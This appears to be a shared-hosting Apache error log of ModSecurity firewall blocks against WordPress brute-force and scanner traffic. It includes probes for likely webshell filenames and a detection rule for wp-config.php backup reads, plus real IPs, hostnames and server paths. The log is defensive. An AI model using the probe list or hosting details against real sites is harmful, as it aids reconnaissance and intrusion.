[Tue May 26 17:02:02.170725 2026] [security2:error] [pid 851641:tid 851868] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEsRp8QSN2510avp4YwgAAAGE"]
[Tue May 26 17:02:02.928746 2026] [autoindex:error] [pid 851641:tid 851796] [client 136.107.212.150:56347] AH01276: Cannot serve directory /home2/tips4iow/traderscafe.club/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:02:03.292864 2026] [log_config:warn] [pid 839808:tid 839987] (32)Broken pipe: [client 152.59.149.242:57590] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://samayikprasanga.in/epaper.php?pn=3
[Tue May 26 17:02:03.292897 2026] [log_config:warn] [pid 839808:tid 839987] (32)Broken pipe: [client 152.59.149.242:57590] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://samayikprasanga.in/epaper.php?pn=3
[Tue May 26 17:02:03.465888 2026] [security2:error] [pid 851641:tid 851854] [client 136.107.212.150:56347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.212.107.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "traderscafe.club.jiyani.in"] [uri "/xmlrpc.php"] [unique_id "ahWEsxp8QSN2510avp4Y9AAAAFM"]
[Tue May 26 17:02:03.692376 2026] [security2:error] [pid 851641:tid 851835] [client 136.107.212.150:61403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWEsxp8QSN2510avp4Y_wAAAEA"]
[Tue May 26 17:02:03.836465 2026] [security2:error] [pid 851641:tid 851838] [client 136.107.212.150:52548] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWEsxp8QSN2510avp4ZBwAAAEM"]
[Tue May 26 17:02:04.013565 2026] [security2:error] [pid 851641:tid 851892] [client 136.107.212.150:62162] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWEtBp8QSN2510avp4ZDQAAAHk"]
[Tue May 26 17:02:04.194386 2026] [security2:error] [pid 851641:tid 851883] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEsxp8QSN2510avp4ZAwAAAHA"]
[Tue May 26 17:02:04.226856 2026] [security2:error] [pid 851641:tid 851847] [client 136.107.212.150:52538] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWEtBp8QSN2510avp4ZFQAAAEw"]
[Tue May 26 17:02:04.431380 2026] [security2:error] [pid 851641:tid 851890] [client 136.107.212.150:55741] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWEtBp8QSN2510avp4ZGgAAAHc"]
[Tue May 26 17:02:04.593567 2026] [security2:error] [pid 851641:tid 851819] [client 136.107.212.150:57756] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWEtBp8QSN2510avp4ZIwAAADA"]
[Tue May 26 17:02:04.748635 2026] [security2:error] [pid 851641:tid 851830] [client 136.107.212.150:51230] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWEtBp8QSN2510avp4ZLQAAADs"]
[Tue May 26 17:02:04.903379 2026] [security2:error] [pid 851641:tid 851811] [client 136.107.212.150:51003] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWEtBp8QSN2510avp4ZLgAAACg"]
[Tue May 26 17:02:05.124691 2026] [security2:error] [pid 851641:tid 851887] [client 136.107.212.150:58762] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWEtRp8QSN2510avp4ZNQAAAHQ"]
[Tue May 26 17:02:05.364944 2026] [security2:error] [pid 851641:tid 851837] [client 136.107.212.150:60884] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWEtRp8QSN2510avp4ZOwAAAEI"]
[Tue May 26 17:02:06.048250 2026] [security2:error] [pid 851641:tid 851880] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEtRp8QSN2510avp4ZQwAAAG0"]
[Tue May 26 17:02:07.494724 2026] [security2:error] [pid 851641:tid 851749] [remote 111.229.10.83:49710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.10.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWEtxp8QSN2510avp4ZfwAAbms"]
[Tue May 26 17:02:08.608824 2026] [security2:error] [pid 851641:tid 851809] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEuBp8QSN2510avp4ZlwAAACY"]
[Tue May 26 17:02:10.584835 2026] [security2:error] [pid 851641:tid 851796] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEuhp8QSN2510avp4Z3wAAABk"]
[Tue May 26 17:02:13.125698 2026] [security2:error] [pid 851641:tid 851804] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEvBp8QSN2510avp4aRAAAACE"]
[Tue May 26 17:02:13.411191 2026] [security2:error] [pid 851641:tid 851785] [client 52.173.14.114:26063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWEvRp8QSN2510avp4aUQAAAA4"]
[Tue May 26 17:02:13.411335 2026] [security2:error] [pid 851641:tid 851785] [client 52.173.14.114:26063] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWEvRp8QSN2510avp4aUQAAAA4"]
[Tue May 26 17:02:13.534121 2026] [security2:error] [pid 851641:tid 851854] [client 52.173.14.114:22092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/166.php"] [unique_id "ahWEvRp8QSN2510avp4aYAAAAFM"]
[Tue May 26 17:02:13.534303 2026] [security2:error] [pid 851641:tid 851854] [client 52.173.14.114:22092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.osmsi.svijaykumar.in"] [uri "/166.php"] [unique_id "ahWEvRp8QSN2510avp4aYAAAAFM"]
[Tue May 26 17:02:13.654533 2026] [security2:error] [pid 851641:tid 851890] [client 52.173.14.114:24582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/ups.php"] [unique_id "ahWEvRp8QSN2510avp4aagAAAHc"]
[Tue May 26 17:02:13.654652 2026] [security2:error] [pid 851641:tid 851890] [client 52.173.14.114:24582] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.osmsi.svijaykumar.in"] [uri "/ups.php"] [unique_id "ahWEvRp8QSN2510avp4aagAAAHc"]
[Tue May 26 17:02:13.784874 2026] [security2:error] [pid 851641:tid 851838] [client 52.173.14.114:19702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/file5.php"] [unique_id "ahWEvRp8QSN2510avp4abQAAAEM"]
[Tue May 26 17:02:13.785014 2026] [security2:error] [pid 851641:tid 851838] [client 52.173.14.114:19702] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.osmsi.svijaykumar.in"] [uri "/file5.php"] [unique_id "ahWEvRp8QSN2510avp4abQAAAEM"]
[Tue May 26 17:02:13.914373 2026] [security2:error] [pid 851641:tid 851819] [client 52.173.14.114:24591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/file.php"] [unique_id "ahWEvRp8QSN2510avp4abwAAADA"]
[Tue May 26 17:02:13.914474 2026] [security2:error] [pid 851641:tid 851819] [client 52.173.14.114:24591] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.osmsi.svijaykumar.in"] [uri "/file.php"] [unique_id "ahWEvRp8QSN2510avp4abwAAADA"]
[Tue May 26 17:02:14.059960 2026] [security2:error] [pid 851641:tid 851820] [client 52.173.14.114:20914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp_filemanager.php"] [unique_id "ahWEvhp8QSN2510avp4adwAAADE"]
[Tue May 26 17:02:14.060070 2026] [security2:error] [pid 851641:tid 851820] [client 52.173.14.114:20914] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp_filemanager.php"] [unique_id "ahWEvhp8QSN2510avp4adwAAADE"]
[Tue May 26 17:02:14.208585 2026] [security2:error] [pid 851641:tid 851778] [client 52.173.14.114:11022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/file18.php"] [unique_id "ahWEvhp8QSN2510avp4aeAAAAAc"]
[Tue May 26 17:02:14.208717 2026] [security2:error] [pid 851641:tid 851778] [client 52.173.14.114:11022] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.osmsi.svijaykumar.in"] [uri "/file18.php"] [unique_id "ahWEvhp8QSN2510avp4aeAAAAAc"]
[Tue May 26 17:02:14.381565 2026] [security2:error] [pid 851641:tid 851817] [client 52.173.14.114:22142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 114.14.173.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/hplfuns.php"] [unique_id "ahWEvhp8QSN2510avp4ahAAAAC4"]
[Tue May 26 17:02:14.381661 2026] [security2:error] [pid 851641:tid 851817] [client 52.173.14.114:22142] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.osmsi.svijaykumar.in"] [uri "/hplfuns.php"] [unique_id "ahWEvhp8QSN2510avp4ahAAAAC4"]
[Tue May 26 17:02:14.503340 2026] [security2:error] [pid 851641:tid 851822] [client 52.173.14.114:11032] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-config.php"] [unique_id "ahWEvhp8QSN2510avp4ahQAAADM"]
[Tue May 26 17:02:14.503519 2026] [security2:error] [pid 851641:tid 851822] [client 52.173.14.114:11032] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-config.php"] [unique_id "ahWEvhp8QSN2510avp4ahQAAADM"]
[Tue May 26 17:02:15.053470 2026] [security2:error] [pid 851641:tid 851784] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEvhp8QSN2510avp4ajQAAAA0"]
[Tue May 26 17:02:16.702899 2026] [security2:error] [pid 851641:tid 851898] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEwBp8QSN2510avp4auwAAAH8"]
[Tue May 26 17:02:18.117587 2026] [security2:error] [pid 851641:tid 851684] [remote 103.145.62.145:41163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWEwRp8QSN2510avp4a4QAABCo"]
[Tue May 26 17:02:18.680581 2026] [security2:error] [pid 851641:tid 851883] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEwhp8QSN2510avp4a7QAAAHA"]
[Tue May 26 17:02:21.546933 2026] [security2:error] [pid 851641:tid 851851] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWExRp8QSN2510avp4bRgAAAFA"]
[Tue May 26 17:02:23.676057 2026] [security2:error] [pid 851641:tid 851871] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWExxp8QSN2510avp4bqgAAAGQ"]
[Tue May 26 17:02:26.045678 2026] [security2:error] [pid 851641:tid 851862] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEyRp8QSN2510avp4b7QAAAFs"]
[Tue May 26 17:02:27.576738 2026] [security2:error] [pid 851641:tid 851688] [remote 54.36.102.244:50024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWEyxp8QSN2510avp4cIgAADi4"]
[Tue May 26 17:02:27.937141 2026] [security2:error] [pid 851641:tid 851880] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEyxp8QSN2510avp4cJQAAAG0"]
[Tue May 26 17:02:28.929808 2026] [security2:error] [pid 851641:tid 851873] [client 14.191.114.106:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEzBp8QSN2510avp4cRQAAAGY"]
[Tue May 26 17:02:30.316049 2026] [security2:error] [pid 851641:tid 851871] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEzRp8QSN2510avp4ccQAAAGQ"]
[Tue May 26 17:02:31.443003 2026] [security2:error] [pid 851641:tid 851673] [remote 74.7.241.58:45904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWEzxp8QSN2510avp4cngAATx8"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:02:31.848395 2026] [security2:error] [pid 851641:tid 851803] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEzxp8QSN2510avp4cnQAAACA"]
[Tue May 26 17:02:33.583558 2026] [security2:error] [pid 851641:tid 851884] [client 78.47.173.76:47828] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWE0Rp8QSN2510avp4c4wAAAHE"], referer: https://thegoodsporting.com
[Tue May 26 17:02:34.749809 2026] [security2:error] [pid 851641:tid 851786] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE0hp8QSN2510avp4c_AAAAA8"]
[Tue May 26 17:02:36.576797 2026] [security2:error] [pid 851641:tid 851854] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE1Bp8QSN2510avp4dOwAAAFM"]
[Tue May 26 17:02:37.127441 2026] [autoindex:error] [pid 851641:tid 851846] [client 20.197.11.101:65074] AH01276: Cannot serve directory /home2/svijakqj/rbkgroups.co.in/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 17:02:38.715127 2026] [security2:error] [pid 851641:tid 851789] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE1hp8QSN2510avp4dfQAAABI"]
[Tue May 26 17:02:40.754146 2026] [security2:error] [pid 851641:tid 851858] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE2Bp8QSN2510avp4dswAAAFc"]
[Tue May 26 17:02:42.324440 2026] [autoindex:error] [pid 851641:tid 851892] [client 157.245.139.219:52956] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:02:42.415059 2026] [security2:error] [pid 851641:tid 851887] [client 157.245.139.219:52956] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWE2hp8QSN2510avp4d5gAAAHQ"]
[Tue May 26 17:02:42.891112 2026] [security2:error] [pid 851641:tid 851824] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE2hp8QSN2510avp4d6QAAADU"]
[Tue May 26 17:02:45.180130 2026] [security2:error] [pid 851641:tid 851780] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE3Bp8QSN2510avp4ePgAAAAk"]
[Tue May 26 17:02:46.714503 2026] [security2:error] [pid 851641:tid 851862] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE3hp8QSN2510avp4eXgAAAFs"]
[Tue May 26 17:02:48.852943 2026] [security2:error] [pid 851641:tid 851835] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE4Bp8QSN2510avp4elwAAAEA"]
[Tue May 26 17:02:51.852441 2026] [security2:error] [pid 851641:tid 851880] [client 157.245.139.219:53048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.139.245.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahWE4xp8QSN2510avp4fAQAAAG0"]
[Tue May 26 17:02:52.009119 2026] [security2:error] [pid 851641:tid 851857] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE4xp8QSN2510avp4fAAAAAFY"]
